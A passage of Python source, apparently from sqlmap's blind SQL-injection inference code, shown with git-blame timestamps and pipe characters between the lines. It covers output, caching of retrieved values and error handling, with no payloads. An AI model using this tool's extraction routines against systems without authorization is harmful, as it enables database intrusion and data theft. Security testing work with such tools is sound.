elif conf.verbose in (1, 2):
|
|
|
|
dataToStdout(val)
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if len(partialValue) > INFERENCE_BLANK_BREAK and partialValue[-INFERENCE_BLANK_BREAK:].isspace():
|
|
|
|
finalValue = partialValue
|
|
|
|
break
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
except KeyboardInterrupt:
|
|
|
|
abortedFlag = True
|
2012-02-24 14:57:23 +04:00
|
|
|
finally:
|
|
|
|
setFormatterPrependFlag(False)
|
2010-12-11 13:52:04 +03:00
|
|
|
|
2010-11-08 01:42:56 +03:00
|
|
|
if conf.verbose in (1, 2) or showEta:
|
2008-10-15 19:38:22 +04:00
|
|
|
dataToStdout("\n")
|
|
|
|
|
2010-05-11 18:15:03 +04:00
|
|
|
if ( conf.verbose in ( 1, 2 ) and showEta ) or conf.verbose >= 3:
|
2011-01-05 13:25:07 +03:00
|
|
|
infoMsg = "retrieved: %s" % filterControlChars(finalValue)
|
2008-10-15 19:38:22 +04:00
|
|
|
logger.info(infoMsg)
|
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if finalValue is not None:
|
2012-02-21 15:44:48 +04:00
|
|
|
finalValue = decodeHexValue(finalValue) if conf.hexConvert else finalValue
|
2012-02-24 17:07:20 +04:00
|
|
|
hashDBWrite(expression, finalValue)
|
2012-02-17 18:22:48 +04:00
|
|
|
else:
|
2012-02-24 17:07:20 +04:00
|
|
|
hashDBWrite(expression, "%s%s" % (PARTIAL_VALUE_MARKER, partialValue))
|
2008-12-04 20:40:03 +03:00
|
|
|
|
2010-12-21 17:21:24 +03:00
|
|
|
if kb.threadException:
|
2010-06-03 12:55:13 +04:00
|
|
|
raise sqlmapThreadException, "something unexpected happened inside the threads"
|
2008-10-15 19:38:22 +04:00
|
|
|
|
2012-02-17 18:22:48 +04:00
|
|
|
if abortedFlag:
|
|
|
|
raise KeyboardInterrupt
|
|
|
|
|
|
|
|
_ = finalValue or partialValue
|
|
|
|
return getCounter(kb.technique), safecharencode(_) if kb.safeCharEncode else _
|